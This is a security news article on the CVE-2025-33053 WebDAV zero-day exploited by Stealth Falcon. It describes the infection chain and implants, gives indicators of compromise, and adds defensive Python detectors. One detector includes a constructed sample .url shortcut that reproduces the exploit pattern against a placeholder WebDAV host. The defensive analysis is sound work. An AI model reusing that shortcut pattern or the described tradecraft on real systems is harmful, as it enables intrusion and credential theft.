Microsoft Windows WebDAV 0-Day RCE Vulnerability Actively Exploited in The Wild

By Declan Murphy, June 10, 2025
A critical zero-day vulnerability in Microsoft Windows, designated CVE-2025-33053, has been actively exploited by the advanced persistent threat (APT) group Stealth Falcon.

The flaw, which enables remote code execution (RCE) through manipulation of a program's working directory, was addressed by Microsoft in its June 2025 Patch Tuesday updates following responsible disclosure by Check Point Research (CPR). Below is a technical breakdown of the attack and its implications.

Discovery and Exploitation of CVE-2025-33053

In March 2025, CPR identified an attempted cyberattack targeting a Turkish defense company.


The attack leveraged a malicious .url file, likely delivered via spear-phishing emails, to exploit CVE-2025-33053.

This vulnerability allows attackers to manipulate the working directory of legitimate Windows tools, such as iediagcmd.exe, so that they execute malicious files hosted on an attacker-controlled WebDAV server.

The .url file, named TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url, redirected the execution of iediagcmd.exe to a malicious route.exe on a WebDAV server (summerartcamp[.]net@ssl@443\DavWWWRoot\OSYxaOjr).

By altering the working directory, the attacker ensured that Process.Start() prioritized the malicious executable over the legitimate system32 version.

This novel technique, a first for executable-based WebDAV attacks, underscores Stealth Falcon's innovative approach to exploiting system utilities.
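The combination described above, a shortcut that launches a local Windows executable while pointing its working directory at a remote WebDAV share, can be screened for at a mail gateway or in an EDR triage pipeline. The following Python script is an added example and is not code from the article or from Check Point Research; the shortcut text it parses is constructed, the WebDAV host is a placeholder, and the WorkingDirectory key is the standard Internet Shortcut key, not a detail taken from the report.

```python
"""Triage helper for .url (Internet Shortcut) files, looking for the pattern
the article describes: a shortcut that launches a local Windows executable
while pointing its working directory at a remote WebDAV share.
Added example, not code from the article or from Check Point Research.
The shortcut text below is constructed; the host name is a placeholder."""
import configparser
import re
from dataclasses import dataclass, field

# Markers that appear in WebDAV UNC paths as the Windows WebClient forms them
# (\\host@ssl@443\DavWWWRoot\...). Matching is case-insensitive.
WEBDAV_MARKERS = ("@ssl", "davwwwroot")
# Local binaries worth an extra flag; iediagcmd.exe is the one the article names.
WATCHED_BINARIES = {"iediagcmd.exe"}


@dataclass
class UrlVerdict:
    suspicious: bool
    reasons: list = field(default_factory=list)


def is_unc_path(path: str) -> bool:
    """True for \\\\server\\share style paths (either slash direction)."""
    return path.startswith("\\\\") or path.startswith("//")


def has_webdav_marker(path: str) -> bool:
    low = path.lower()
    return is_unc_path(path) and any(m in low for m in WEBDAV_MARKERS)


def analyse_url_file(text: str) -> UrlVerdict:
    """Parse the INI-style shortcut and combine the two signals."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key names as written (URL, WorkingDirectory)
    try:
        cp.read_string(text)
    except configparser.Error as exc:
        return UrlVerdict(False, [f"unparseable: {exc.__class__.__name__}"])
    if not cp.has_section("InternetShortcut"):
        return UrlVerdict(False, ["no [InternetShortcut] section"])
    sec = cp["InternetShortcut"]
    url = sec.get("URL", "")
    workdir = sec.get("WorkingDirectory", "")
    reasons = []

    launches_local_exe = url.lower().startswith("file:") and url.lower().endswith(".exe")
    if launches_local_exe:
        reasons.append("URL launches a local executable")
        exe = re.split(r"[\\/]", url)[-1].lower()
        if exe in WATCHED_BINARIES:
            reasons.append(f"target {exe} is a watched binary")

    if has_webdav_marker(workdir):
        reasons.append("WorkingDirectory points to a WebDAV share")
    elif is_unc_path(workdir):
        reasons.append("WorkingDirectory is a remote UNC path")

    # A remote working directory by itself is odd but not conclusive; a local
    # executable combined with one is the pattern to escalate.
    suspicious = launches_local_exe and is_unc_path(workdir)
    return UrlVerdict(suspicious, reasons)


# Constructed samples: one shortcut with the suspicious combination, one benign.
# The executable path is the usual install location, written here as sample data.
SAMPLE_SUSPICIOUS = """[InternetShortcut]
URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe
WorkingDirectory=\\\\webdav.example.invalid@ssl@443\\DavWWWRoot\\share
IconFile=C:\\Windows\\System32\\shell32.dll
IconIndex=1
"""
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://www.example.com/
"""

if __name__ == "__main__":
    for name, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, analyse_url_file(sample))
```

The verdict deliberately requires both signals: shortcuts with a remote working directory alone are unusual but occur in some enterprise deployments, so they are reported as a reason without escalating.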

Stealth Falcon, also known as FruityArmor, has been active since at least 2012, targeting government and defense sectors in the Middle East and Africa, including Turkey, Qatar, Egypt, and Yemen.

According to the Check Point report, the group is known for acquiring zero-day exploits and deploying sophisticated, custom-built payloads.

Their latest campaign introduces the Horus Agent, a custom implant built on the open-source Mythic C2 framework and named after the Egyptian falcon-headed god.

Infection Chain

Figure: Windows WebDAV 0-day infection chain (Source: Check Point)
1. A phishing email delivers a malicious .url file, often inside a ZIP archive, disguised as a legitimate document.
2. This file exploits CVE-2025-33053, manipulating iediagcmd.exe to run a malicious route.exe from a WebDAV server.
3. The attack deploys Horus Loader, a C++-based loader protected by Code Virtualizer, which evades detection through anti-analysis techniques such as manual mapping of kernel32.dll and ntdll.dll and scanning for 109 antivirus processes from 17 vendors.
4. It distracts victims by decrypting and displaying a decoy PDF, such as TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.
5. The loader uses IPfuscation to decode a payload from IPv6 addresses, injecting it into msedge.exe using ZwAllocateVirtualMemory, ZwWriteVirtualMemory, and NtResumeThread.
6. The Horus Agent, the final payload, employs custom OLLVM obfuscation with string encryption (shift cipher, -39) and control-flow flattening, along with API hashing to resolve imports dynamically.
7. It communicates with command-and-control servers via AES-encrypted HTTP requests, secured with HMAC-SHA256, using up to four domains and a killswitch date of December 31, 2099.
8. Supported commands include system enumeration (survey) and stealthy shellcode injection (shinjectchunked).
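Step 5 of the chain relies on IPfuscation: the payload is stored as a list of IPv6 address strings, each of which packs 16 raw bytes, so the loader can carry the blob as innocuous-looking text. The Python below is an added analyst's example, not Check Point's or the loader's code; it recovers such a payload from a strings dump using the standard library's ipaddress module, tolerates junk between the addresses, and measures how long a run of consecutive IPv6 literals is, which is a cheap hint that a binary stores data this way. The sample payload and function names are constructed.

```python
"""Recover a payload stored as a list of IPv6 address strings, the
"IPfuscation" encoding the article attributes to Horus Loader, and spot such
an array in a strings dump. Added example for analysts, not Check Point's or
the loader's code; the sample payload and function names are constructed."""
import ipaddress
from typing import Iterable, List


def ipv6_encode(payload: bytes) -> List[str]:
    """Render a blob as 16-byte chunks, each written as an IPv6 literal.
    The last chunk is zero-padded. Used here only to build sample data."""
    addrs = []
    for i in range(0, len(payload), 16):
        chunk = payload[i:i + 16].ljust(16, b"\x00")
        addrs.append(str(ipaddress.IPv6Address(chunk)))
    return addrs


def ipv6_decode(addrs: Iterable[str], strip_padding: bool = True) -> bytes:
    """Inverse: every valid IPv6 literal contributes its 16 packed bytes.
    Strings that are not IPv6 literals (junk between the addresses in a
    strings dump) are skipped instead of aborting. strip_padding removes
    trailing NULs from the zero-padded final chunk; turn it off if the real
    payload may legitimately end in NUL bytes."""
    out = bytearray()
    for s in addrs:
        try:
            out += ipaddress.IPv6Address(s.strip()).packed
        except ipaddress.AddressValueError:
            continue
    data = bytes(out)
    return data.rstrip(b"\x00") if strip_padding else data


def longest_ipv6_run(lines: Iterable[str]) -> int:
    """Length of the longest run of consecutive IPv6 literals. Ordinary
    binaries rarely carry more than a handful in a row, so a long run in a
    strings dump is a cheap hint that a payload is stored this way."""
    run = best = 0
    for s in lines:
        try:
            ipaddress.IPv6Address(s.strip())
            run += 1
        except ipaddress.AddressValueError:
            run = 0
        best = max(best, run)
    return best


# Constructed sample: harmless text standing in for the real payload bytes.
SAMPLE_PAYLOAD = b"constructed sample payload: not real shellcode, just bytes"
SAMPLE_ADDRS = ipv6_encode(SAMPLE_PAYLOAD)

if __name__ == "__main__":
    print("\n".join(SAMPLE_ADDRS))
    print(ipv6_decode(SAMPLE_ADDRS))
```

For triage, run the output of a strings tool through longest_ipv6_run first; only when a long run shows up is it worth calling ipv6_decode on that region and handing the recovered bytes to a sandbox or disassembler.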

The attack employs a multi-stage infection chain involving Spayload, a C++ Mythic implant with advanced capabilities.

Stealth Falcon's toolkit includes several undocumented tools for post-compromise operations.

The DC Credential Dumper targets the NTDS.dit, SAM, and SYSTEM files by accessing a virtual disk at C:\ProgramData\ds_notifier_0.vhdx using the DiscUtils library, compressing the files into a ZIP archive named ds_notifier_2.vif for exfiltration.

The Passive Backdoor, usrprofscc.exe, is a C-based tool that runs as a service (UsrProfSCC) with admin privileges, listening for AES-encrypted shellcode payloads.

The Custom Keylogger, StatusReport.dll, injects into dxdiag.exe, logging keystrokes to an RC4-encrypted file at C:\Windows\Temp\~TN%LogName%.tmp.

Mitigation and Recommendations

Microsoft's patch for CVE-2025-33053 is now available, and organizations are urged to apply it immediately. CPR recommends:

• Patching Systems: Update Windows to mitigate the WebDAV vulnerability.
• Phishing Awareness: Train employees to recognize spear-phishing emails with suspicious attachments or links.
• Network Monitoring: Watch for WebDAV-related traffic to domains such as summerartcamp[.]net or mystartupblog.com.
• Endpoint Protection: Deploy solutions that detect LOLBin abuse and unauthorized process injection.
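The network-monitoring recommendation can be put into practice against web-proxy logs: the Windows WebClient service identifies itself with the Microsoft-WebDAV-MiniRedir user-agent, issues OPTIONS and PROPFIND requests, and asks for a DavWWWRoot path, so those indicators plus the two domains named in the article give a workable rule. The Python below is an added example and not Check Point's tooling; its log format and sample lines are constructed, and the allowed_hosts parameter exists to keep known internal WebDAV servers from generating alerts.

```python
"""Scan web-proxy log lines for WebDAV activity, the network monitoring the
article recommends. Added example, not Check Point's tooling; the log format
and the sample lines are constructed. The watchlist carries the two domains
the article names (defanged), and allowed_hosts keeps known internal WebDAV
servers out of the alerts."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set, Tuple

# Indicators of the Windows WebClient (the WebDAV Mini-Redirector) at work.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "OPTIONS"}
WEBDAV_UA = "Microsoft-WebDAV-MiniRedir"   # user-agent prefix of the WebClient service
WEBDAV_PATH_HINT = "/davwwwroot"           # path element the redirector requests
WATCHLIST = {d.replace("[.]", ".") for d in ("summerartcamp[.]net", "mystartupblog.com")}

# Constructed format: <timestamp> <client-ip> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


@dataclass
class Alert:
    line_no: int
    src: str
    host: str
    reasons: Tuple[str, ...]


def host_of(url: str) -> str:
    m = re.match(r"^[a-z][a-z0-9+.-]*://([^/:]+)", url, re.I)
    return m.group(1).lower() if m else ""


def indicators(line: str) -> Optional[Tuple[str, str, List[str]]]:
    """Return (client, host, reasons) for a parseable line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host = host_of(m["url"])
    reasons = []
    if m["method"] in WEBDAV_METHODS:
        reasons.append(f"WebDAV method {m['method']}")
    if WEBDAV_UA in m["ua"]:
        reasons.append("WebClient user-agent")
    if WEBDAV_PATH_HINT in m["url"].lower():
        reasons.append("DavWWWRoot path")
    if host in WATCHLIST:
        reasons.append(f"watchlisted domain {host}")
    return m["src"], host, reasons


def scan(lines: Iterable[str], allowed_hosts: Optional[Set[str]] = None) -> List[Alert]:
    """Alert on any watchlist hit, or on two or more WebDAV indicators on one
    line. A lone OPTIONS request is too common to act on by itself."""
    allowed = {h.lower() for h in (allowed_hosts or set())}
    alerts = []
    for n, line in enumerate(lines, 1):
        found = indicators(line)
        if not found:
            continue
        src, host, reasons = found
        if host in allowed:
            continue
        watchlisted = any(r.startswith("watchlisted") for r in reasons)
        if watchlisted or len(reasons) >= 2:
            alerts.append(Alert(n, src, host, tuple(reasons)))
    return alerts


# Constructed sample traffic from two clients.
SAMPLE_LOG = [
    '2025-06-10T09:14:02Z 10.1.4.23 GET https://www.example.com/index.html 200 "Mozilla/5.0"',
    '2025-06-10T09:14:05Z 10.1.4.23 OPTIONS https://cdn.example.com/ 200 "Mozilla/5.0"',
    '2025-06-10T09:15:11Z 10.1.4.23 OPTIONS https://summerartcamp.net/ 200 "Microsoft-WebDAV-MiniRedir/10.0.19045"',
    '2025-06-10T09:15:12Z 10.1.4.23 PROPFIND https://summerartcamp.net/DavWWWRoot/share/ 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"',
    '2025-06-10T09:20:40Z 10.1.4.51 PROPFIND https://files.internal.example/DavWWWRoot/docs/ 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG, allowed_hosts={"files.internal.example"}):
        print(a)
```

Without the allowlist the internal server on the last sample line also alerts, which is the false positive an analyst would otherwise chase; in a real deployment the same WebClient indicators seen in endpoint telemetry (the WebClient service starting on a workstation that never used it) are a useful corroborating signal.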

The exploitation of CVE-2025-33053 by Stealth Falcon highlights the group's technical sophistication and focus on high-value targets in the Middle East.

By combining zero-day exploits, custom implants, and evasive techniques, the group poses a significant threat to regional security. Organizations should prioritize patching and proactive monitoring to counter this evolving threat.
